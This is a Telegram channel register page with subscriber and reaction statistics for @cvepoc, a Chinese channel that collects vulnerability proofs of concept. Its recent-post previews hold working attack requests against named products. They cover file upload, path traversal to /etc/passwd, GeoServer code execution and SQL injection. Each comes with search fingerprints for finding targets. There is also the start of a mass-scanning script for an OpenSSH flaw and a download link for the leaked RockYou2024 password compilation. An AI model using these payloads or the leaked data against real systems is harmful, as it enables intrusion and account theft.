https://github.com/CloudCrowSec001/CVE-2024-38077-POC

Channel
漏洞先知 【收集全网漏洞】
@cvepoc
On this record: Growth · Engagement · Reactions · Posts · Cite this entry
218subscribers
-5 since we began measuring on 7 August 2026
Risers and fallers across the register · movement among entries of Under 1,000.
Register entry
| Telegram ID | -1002009702633 |
|---|---|
| Type | Channel |
| Username | @cvepoc |
| Created | Between 1 November 2023 and 31 May 2024— estimated from Telegram’s id allocation, not measured. How this range is calculated. |
| First recorded | 8 August 2026 |
| Last confirmed live | 29 August 2026 |
| Measurements held | 5 |
| Confirmed unchanged | 1 time, most recently 29 August 2026 |
| On Telegram | t.me/cvepoc |
Growth
| Measured (UTC) | Subscribers | Change |
|---|---|---|
| 29 Aug 2026, 03:26 | 218 | -2 |
| 14 Aug 2026, 09:55 | 220 | -2 |
| 8 Aug 2026, 10:32 | 222 | no change |
| 7 Aug 2026, 17:52 | 222 | -1 |
| 7 Aug 2026, 13:16 | 223 | first reading |
Engagement
16 posts held, back to 29 June 2024 — the reader has not yet reached the start of this channel’s public history, so older posts may sit further back, unread. Read across 1 pageof Telegram’s post history, 20 posts per page.
Nothing published in the last 30 days. ERR and ER are rolling 30-day measures, so there is nothing to compute — we hold 16 posts for this entry, the most recent from 9 August 2024. An engagement rate over an empty window would be a number about nothing.
Reaction mix
4 reactions across 2 posts, in 2 distinct kinds. The most used accounts for 75.0% of them.
| Reaction | Count | Share | Share, drawn |
|---|---|---|---|
| ❤ | 3 | 75.0% | |
| 👍 | 1 | 25.0% |
No sentiment is inferred, and none should be read in. This table is ordered by count and by nothing else. Emoji do not carry stable meaning across languages or communities — 🙏 is thanks in one channel and mourning in another — so we publish which ones were pressed and how often, and pass no judgement on what an audience meant by them.
Precision. Telegram publishes reaction counts per emoji and short-forms each one — 4.34K, 1.2M — so any single kind at or above 1,000 reaches us at three significant figures, and only counts below 1,000 are exact. The shares above are ratios of those figures and carry the same error. This is also why the total here can differ slightly from a reaction total printed elsewhere on the page: both are sums of the same rounded parts, taken over samples with different edges.
Coverage. Reactions were read on 2 of the 16 sampled posts in this sample. Summed by Telegram’s own count on each post — not by adding up the per-emoji breakdown above — those same posts carry 4reactions in total: the kind of figure the paragraph above means by “a reaction total printed elsewhere on the page”.
Measured over the 16 most recent posts we hold, published 29 June 2024 to 9 August 2024, using the newest reading held for each. Telegram Stars are excluded: they are a payment, not a reaction, and they have their own section.
Recent posts
某 BC 系统 pcweb 文件上传漏洞 资源测绘 body="main.e5ee9b2df05fc2d310734b11cc8c911e.css" POC POST /statics/admin/webuploader/0.1.5/server/preview.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Acc…
❤3
新中小学智慧校园信息管理系统PSE存在任意文件上传 资源测绘 body="/Login/IndexMobi" POC POST /PSE/Upload HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Content-Type: multipart/form-data; boundary=00content0boundary00 Host: Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 149 Connection: close --00content0boundary00 Content-Dis…
启明星辰天青汉马VPN-download-client-任意文件读取 资源测绘 app="启明星辰-天清汉马VPN" POC GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1 Host: ip User-AgentMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Content-Length: 2
史上最大密码泄露下载:RockYou2024 密码汇编泄露近 100 亿 RockYou2024 是迄今为止最大的密码汇编泄露事件,泄露数据文档中竟包含 9948575739 个独特的明文密码 下载地址: https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip #pentest
【未公开】Crocus存在Service.do任意文件下载漏洞 资源测绘 body="inp_verification" POC GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1 Host: 0.0.0.0
GeoServer 属性名表达式前台代码执行漏洞(CVE-2024-36401) 基于GET方法的POC GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik…
某云APP签名分发系统任意文件上传 资源测绘 body="/api/statistics/service-usage-amount" POC POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 C…
该漏洞在实战中被利用的可能性有多大? 该漏洞不太可能被用于远程大规模攻击。理由如下: 漏洞利用条件:该漏洞类型为条件竞争,由于条件竞争漏洞的特性,较难写出稳定的漏洞利用。另外,目前已知的漏洞利用需要绕过ASLR和依赖特定版本的glibc内存结构布局,这意味着攻击者必须事先知道他们针对的 Linux 发行版才能构建功能性漏洞。综上所示,该漏洞难以被规模化的利用于实际攻击中。 漏洞利用难度:虽然目前已有国外安全厂商成功利用该漏洞实现了远程代码执行,但想成功利用此漏洞需要大量持续的发送SSH数据包,目前已知的最少成功利用时间为6-8个小时。此漏洞利用行为类似于SSH暴力破解,这意味着任何现有的暴力破解预防和检测措施都能有效缓解这种攻击,因此在受到良好保护的环境中,该技术的成功率相当低。
CVE-2024-6387OpenSSH远程代码执行漏洞 | 带自写批量检测脚本 资源测绘 Fofa:protocol="ssh" quake:app:"OpenSSH" hunter:app.name="OpenSSH" POC 多线程,批量跑 来源 暗影网安实验室 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning import threading import queue from tqdm import tqdm import socket import time import struct import sys import argparse # 禁用InsecureRequestWarning警告 requests.packages.urllib3.disable_warnings(…
【1day】WordPress插件Recall CVE-2024-32709 SQL注入漏洞 资源测绘 "/wp-content/plugins/wp-recall/" POC GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(123456),0x7c),13--+- HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 Connection: close
科荣AIO管理系统-SQL注入-moffice 资源测绘 body="changeAccount('8000')" POC GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:3'--&sid=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-En…
Showing the 12 most recent of 16 posts we hold for @cvepoc. View and reaction counts are the latest single reading for each post, not a live figure, and a recent post is still accumulating both. A view count marked ≈ was rounded by Telegram before we ever saw it — t.me prints views in full below 1,000 and to three significant figures above, so ≈1,200,000 means somewhere between 1,150,000 and 1,249,999. Unmarked counts are exact. Text is reproduced from the public post preview and truncated for length.
Cite this entry
A live page changes as we take new readings, so a citation should name the measurement it is based on, not just the URL. The line below cites the subscriber count as measured 29 August 2026 — this entry's latest reading, not the date you are reading this.
“漏洞先知 【收集全网漏洞】” (@cvepoc), 218 subscribers as measured 29 August 2026. Telegram Register, tgregister.com/channel/cvepoc.
Full measurement history, CC BY 4.0. Every reading this register holds for this entry, not just the latest one, as a dated, downloadable record: CSV · JSON. Free to use with attribution to tgregister.com. Each file carries its own generation timestamp, which is the figure to cite for exactly when the data was retrieved.